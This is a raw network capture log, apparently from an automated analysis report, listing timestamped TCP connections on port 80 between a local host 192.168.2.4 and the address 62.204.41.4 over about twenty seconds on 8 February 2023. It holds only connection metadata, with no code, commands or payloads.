                            Feb 8, 2023 17:39:12.823951006 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.885303974 CET805006862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.887738943 CET805006862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.887900114 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.993813992 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.995038033 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.055373907 CET805006862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.055533886 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.056196928 CET805006962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.056317091 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.057358027 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.070317984 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.119081974 CET805006962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.122652054 CET805006962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.122879028 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.130878925 CET805006762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.132982969 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.235125065 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.236795902 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.296674013 CET805006962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.296902895 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.298315048 CET805007062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.298490047 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.299293041 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.360929966 CET805007062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.363473892 CET805007062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.363658905 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.477710962 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.478571892 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.538151979 CET805007162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.539341927 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.539390087 CET805007062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.539786100 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.540692091 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.600233078 CET805007162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.602624893 CET805007162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.602864027 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.712066889 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.713434935 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.771509886 CET805007162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.771855116 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.774796963 CET805007262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.776880980 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.789124012 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.850603104 CET805007262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.853332043 CET805007262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.855465889 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.961566925 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.962168932 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.023343086 CET805007262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.023531914 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.024719954 CET805007362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.024837971 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.025211096 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.087819099 CET805007362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.091411114 CET805007362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.091556072 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.196455956 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.197429895 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.258053064 CET805007462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.258232117 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.259121895 CET805007362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.259248972 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.260435104 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.321902990 CET805007462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.324162006 CET805007462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.324266911 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.431209087 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.431984901 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.491905928 CET805007462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.492031097 CET805007562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.492172003 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.492274046 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.493858099 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.554119110 CET805007562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.559590101 CET805007562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.559741020 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.666830063 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.668126106 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.727144003 CET805007562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.727287054 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.727634907 CET805007662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.727785110 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.728959084 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.788563013 CET805007662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.790911913 CET805007662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.791042089 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.916178942 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.917269945 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.975888014 CET805007662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.976025105 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.978601933 CET805007762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.978744984 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.979084969 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.041541100 CET805007762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.045377970 CET805007762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.045561075 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.152221918 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.152932882 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.214298010 CET805007762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.214519024 CET805007862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.214541912 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.214790106 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.231604099 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.293329000 CET805007862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.295681000 CET805007862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.295799017 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.411355019 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.412148952 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.472481012 CET805007962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.472712994 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.474750996 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.474946976 CET805007862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.475068092 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.535200119 CET805007962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.537436008 CET805007962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.537508011 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.660403967 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.661120892 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.720695019 CET805008062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.720736980 CET805007962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.720788002 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.720828056 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.721318960 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.780972004 CET805008062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.783492088 CET805008062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.783633947 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.900047064 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.901081085 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.959820986 CET805008062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.962655067 CET805008162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.962840080 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.962888002 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.969624043 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.031378031 CET805008162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.033631086 CET805008162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.033751965 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.149317980 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.150060892 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.211194992 CET805008162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.211338043 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.212522030 CET805008262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.213114023 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.214185953 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.276773930 CET805008262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.280766010 CET805008262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.281028986 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.386317968 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.388760090 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.449043036 CET805008262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.449290991 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.449421883 CET805008362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.449569941 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.450190067 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.510740042 CET805008362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.513186932 CET805008362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.515681028 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.621385098 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.623502970 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.682220936 CET805008362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.682555914 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.683778048 CET805008462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.683887959 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.684237003 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.745601892 CET805008462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.747688055 CET805008462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.751669884 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.880429029 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.881313086 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.940907001 CET805008462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.941508055 CET805008562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.941687107 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.941759109 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.942706108 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.003218889 CET805008562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.006316900 CET805008562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.006628036 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.119816065 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.120832920 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.180507898 CET805008562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.180711031 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.181858063 CET805008662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.182028055 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.186332941 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.246824026 CET805008662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.251060963 CET805008662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.251202106 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.352545023 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.353398085 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.413093090 CET805008662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.413389921 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.414086103 CET805008762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.414275885 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.420202971 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.482554913 CET805008762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.484596014 CET805008762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.484774113 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.593674898 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.594472885 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.656564951 CET805008762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.656627893 CET805008862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.656785965 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.656938076 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.657423973 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.719161034 CET805008862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.721311092 CET805008862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.721446991 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.847239017 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.848162889 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.909302950 CET805008862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.909430027 CET805008962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.909598112 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.909832954 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.910351038 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.971684933 CET805008962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.974165916 CET805008962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.974399090 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.086999893 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.087740898 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.148911953 CET805009062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.149051905 CET805008962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.149130106 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.149189949 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.150814056 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.211919069 CET805009062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.215178967 CET805009062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.215322971 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.325419903 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.326456070 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.386177063 CET805009062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.386321068 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.390924931 CET805009162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.391160965 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.399399042 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.461292982 CET805009162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.464189053 CET805009162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.464323997 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.571465969 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.572386026 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.631850958 CET805009262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.632030964 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.633208990 CET805009162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.633321047 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.634985924 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.694705963 CET805009262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.697040081 CET805009262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.697171926 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.812550068 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.813465118 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.872040033 CET805009262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.872143984 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.874893904 CET805009362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.875031948 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.875583887 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.937060118 CET805009362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.939227104 CET805009362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.939289093 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.063987970 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.064918995 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.125741959 CET805009362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.125911951 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.126342058 CET805009462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.126533985 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.127295971 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.188819885 CET805009462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.033772945 CET5013380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.153693914 CET5013380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.161550045 CET5013480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.216301918 CET805013362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.216449976 CET5013380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.222172976 CET805013462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.222301960 CET5013480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.223273039 CET5013480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.283866882 CET805013462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.288228035 CET805013462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.288373947 CET5013480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.400919914 CET5013480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.402713060 CET5013580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.461968899 CET805013462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.462294102 CET805013562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.462496042 CET5013480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.462574005 CET5013580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.463987112 CET5013580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.523307085 CET805013562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.525877953 CET805013562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.528556108 CET5013580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.636624098 CET5013580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.637850046 CET5013680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.696214914 CET805013562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.696892977 CET5013580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.698463917 CET805013662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.698709965 CET5013680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.705547094 CET5013680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.766587973 CET805013662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.769449949 CET805013662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.769555092 CET5013680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.885633945 CET5013680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.886802912 CET5013780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.946332932 CET805013662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.946546078 CET5013680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.947438002 CET805013762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:29.950275898 CET5013780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:29.950706959 CET5013780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.011409998 CET805013762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.013868093 CET805013762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.014008999 CET5013780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.120548010 CET5013780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.122327089 CET5013880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.181282043 CET805013762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.181391954 CET5013780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.184729099 CET805013862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.184917927 CET5013880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.185255051 CET5013880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.253662109 CET805013862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.258173943 CET805013862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.258337975 CET5013880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.373130083 CET5013880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.374233961 CET5013980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.435297966 CET805013962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.435506105 CET5013980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.435661077 CET805013862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.435745001 CET5013880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.435909033 CET5013980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.498363972 CET805013962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.501003027 CET805013962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.501101017 CET5013980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.604222059 CET5013980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.605307102 CET5014080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.665275097 CET805013962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.665615082 CET5013980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.666532993 CET805014062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.666671991 CET5014080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.667124033 CET5014080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.727565050 CET805014062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.729938984 CET805014062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.730113029 CET5014080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.842673063 CET5014080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.843739986 CET5014180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.903376102 CET805014062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.903546095 CET5014080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.904159069 CET805014162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.904316902 CET5014180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.904820919 CET5014180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:30.965262890 CET805014162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.967626095 CET805014162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:30.967750072 CET5014180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.073417902 CET5014180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.074486017 CET5014280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.134326935 CET805014162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:31.134443045 CET5014180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.135827065 CET805014262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:31.135950089 CET5014280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.136436939 CET5014280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.197791100 CET805014262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:31.202301025 CET805014262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:31.202523947 CET5014280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.307323933 CET5014280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.308371067 CET5014380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.368758917 CET805014262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:31.368943930 CET5014280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.369730949 CET805014362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:31.369863987 CET5014380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.370430946 CET5014380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:31.431843996 CET805014362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:31.433823109 CET805014362.204.41.4192.168.2.4
